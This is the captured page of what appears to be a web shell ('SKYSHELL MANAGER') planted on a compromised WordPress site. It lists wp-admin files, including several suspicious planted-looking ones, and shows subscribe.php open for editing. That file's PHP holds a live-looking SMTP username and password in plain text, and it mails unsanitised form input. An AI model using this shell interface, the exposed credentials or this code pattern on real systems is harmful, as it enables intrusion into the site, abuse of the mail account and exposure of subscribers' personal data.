📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: subscribe.php
<!DOCTYPE html> <html> <head> <link rel="icon" href="images/fav.png"/> <title>contentevergreen</title> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" type="text/css" href="css/bootstrap.min.css"> <link rel="stylesheet" type="text/css" href="css/font-awesome.min.css"> <link rel="stylesheet" type="text/css" href="css/animate.css"> <link rel="stylesheet" type="text/css" href="css/slick.css"> <link rel="stylesheet" type="text/css" href="css/theme.css"> <link rel="stylesheet" type="text/css" href="css/style.css"> <!--[if lt IE 9]> <script src="assets/js/html5shiv.min.js"></script> <script src="assets/js/respond.min.js"></script> <![endif]--> </head> <body> <!--<div id="preloader"> <div id="status"> </div> </div>--> <a class="scrollToTop" href="#"><i class="fa fa-angle-up"></i></a> <div class="container"> <header id="header"> <div class="row"> <div class="col-lg-3 col-md-12"> <div class="header_bottom"> <div class="header_bottom_left"><a class="logo" href="index.php"><img src="images/logo5.png" width="200px"></a></div> <!--div class="header_bottom_right"><a><img src="images/flag.png" alt="flag"></a></div --> </div> </div> <div class="col-lg-9 col-md-12"> <div id="navarea"> <nav role="navigation"> <div class="container-fluid"> <div class="navbar-header"> <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> </div> <div id="navbar" class="navbar-collapse collapse"> <ul class="nav navbar-nav custom_nav"> <li class="active"><a href="index.php">Home</a></li> <li><a href="world.php">World</a></li> <li><a href="finance.php">Finance</a></li> <li><a href="market.php">Market</a></li> <li><a href="technology.php">Technology</a></li> <li><a href="trending.php">Trending</a></li> <li><a href="top_news.php">Top News</a></li> </ul> </div> </div> </nav> </div> </div> </div> </header> <!--<section id="mainContent"> <div class="content_top"> <div class="row"> <div class="col-lg-6 col-md-6 col-sm6"> <div class="latest_slider"> <div class="slick_slider"> <div class="single_iteam"><img src="images/world.png" alt=""> <h2><a class="slider_tittle" href="world.php">Technology World Of America</a></h2> </div> <div class="single_iteam"><img src="images/sports1.png" alt=""> <h2><a class="slider_tittle" href="sports.php">sports Of America</a></h2> </div> <div class="single_iteam"><img src="images/technology.png" alt=""> <h2><a class="slider_tittle" href="techandmedia.php">Fun and Games</a></h2> </div> <div class="single_iteam"><img src="images/weather.png" alt=""> <h2><a class="slider_tittle">Weather in United states</a></h2> </div> </div> </div> </div> <div class="col-lg-6 col-md-6 col-sm6"> <div class="content_top_right"> <ul class="featured_nav wow fadeInDown"> <li><img src="images/basketball.jpg" alt=""> <div class="title_caption"><a href="basketball.php">Sports : Basketball</a></div> </li> <li><img src="images/alabama.jpg" alt=""> <div class="title_caption"><a href="alabama.php">4 Alabama players announce they are declaring for NFL draft</a></div> </li> <li><img src="images/cloud.jpg" alt=""> <div class="title_caption"><a href="cloud-computing.php">Cloud Computing</a></div> </li> <li><img src="images/politics.jpg" alt=""> <div class="title_caption"><a href="politics.php">politics</a></div> </li> </ul> </div> </div> </div> </div> </section>--> <section id="ContactContent"> <div class="row"> <div class="col-lg-12 col-md-12 col-sm-12"> <div class="contact_area"> <h1 style="font-size:28px;">Subscribe Us</h1> <p>Please Subscribe Us for Getting Latest Newsletters</p> <div class="contact_us wow fadeInLeftBig" style="float:left;width:30%;"> <img src="images/subscribe.png" title="" style="width:90%;"> </div> <div class="contact_bottom" style="width:58%;float:right;"> <div class="contact_us wow fadeInRightBig"> <form action="subscribe.php" method="post" class="contact_form"> <input class="form-control" type="text" name="name" placeholder="Name(required)" required> <input class="form-control" type="email" name="email" placeholder="E-mail(required) required" required> <input class="form-control" type="number" name="age" placeholder="Age(required) required" required><br> <label>Gender</label><br> <input type="radio" name="gender" value="male" required> Male<br> <input type="radio" name="gender" value="female"> Female<br> <input type="radio" name="gender" value="other"> Other<br><br> <input type="submit" name="Submit" placeholder="Submit"> </form> <?php //subscribe form if (isset($_POST['Submit'])){ $name=$_REQUEST['name']; $email=$_REQUEST['email']; $age=$_REQUEST['age']; $gender=$_REQUEST['gender']; if (($email=="")||($email=="")) { echo "All fields are required, please fill the form again."; } else{ include_once('/var/www/html/wxwpsite/contentevergreen/PHPMailer/PHPMailerAutoload.php'); //PHPMailer Object $mail = new PHPMailer; //$mail->SMTPDebug = 3; $mail->Host = 'smtp.yandex.com'; // SMTP server $mail->Port = 465; // optional // used only when SMTP requires authentication $mail->SMTPAuth = true; $mail->Username = 'contact@contentevergreen.com'; $mail->Password = 'Bc=Zp%S9RKv85kVj'; $mail->SMTPSecure = 'ssl'; $mail->IsSMTP(); //From email address and name $mail->setFrom('contact@contentevergreen.com', 'Content Evergreen'); //To address and name $mail->addAddress($email, $name, $message); //$mail->addAddress("recepient1@example.com"); //Recipient name is optional //Address to which recipient will reply $mail->addReplyTo("contact@contentevergreen.com", "Reply"); //Send HTML or Plain Text email $mail->isHTML(true); $mail->Subject = "Thanks for Subscribing [Success!]"; $mail->Body = "<p>This message confirms that you have subscribed from the Content Evergreen newsletter.</p></br> <p>Thank you!</p></br> <i>This e-mail was sent from a subscribe form on (http://contentevergreen.com/)</i>"; $mail->AltBody = "This is the plain text version of the email content"; if(!$mail->send()) { echo "Mailer Error: "; } else { echo "Thanks for subscribing to our service."; } //PHPMailer Object $mail2 = new PHPMailer; //$mail->SMTPDebug = 3; $mail2->Host = 'smtp.yandex.com'; // SMTP server $mail2->Port = 465; // optional // used only when SMTP requires authentication $mail2->SMTPAuth = true; $mail2->Username = 'contact@contentevergreen.com'; $mail2->Password = 'Bc=Zp%S9RKv85kVj'; $mail2->SMTPSecure = 'ssl'; $mail2->IsSMTP(); $mail2->setFrom('contact@contentevergreen.com', 'Content Evergreen'); $mail2->addAddress('contact@contentevergreen.com', 'Content Evergreen'); $mail2->isHTML(true); $mail2->Subject = "Contact Details"; $mail2->Body = "<strong>Following user has been submitted contact details on your website <strong><br> Name : $name<br> Email : $email<br> Age : $age<br> Gender : $gender<br>"; $mail2->send(); } } ?> </div> </div> </div> </div> </div> </section> </div> <footer id="footer"> <div class="footer_bottom"> <div class="container"> <div class="row"> <div class="col-lg-6 col-md-6 col-sm-6 col-xs-12"> <div class="center"> <p>Copyright © 2025 Content Evergreen. All rights reserverd. <a href="privacy.php" style="color:#fff"> || Privacy Policy</a><a href="terms.php" style="color:#fff"> || Terms & Conditions</a><a href="contact.php" style="color:#fff"> || Help</a></p> </div> </div> </div> </div> </div> </footer> <script src="js/jquery.min.js"></script> <script src="js/bootstrap.min.js"></script> <script src="js/wow.min.js"></script> <script src="js/slick.min.js"></script> <script src="js/custom.js"></script> </body> </html>
Save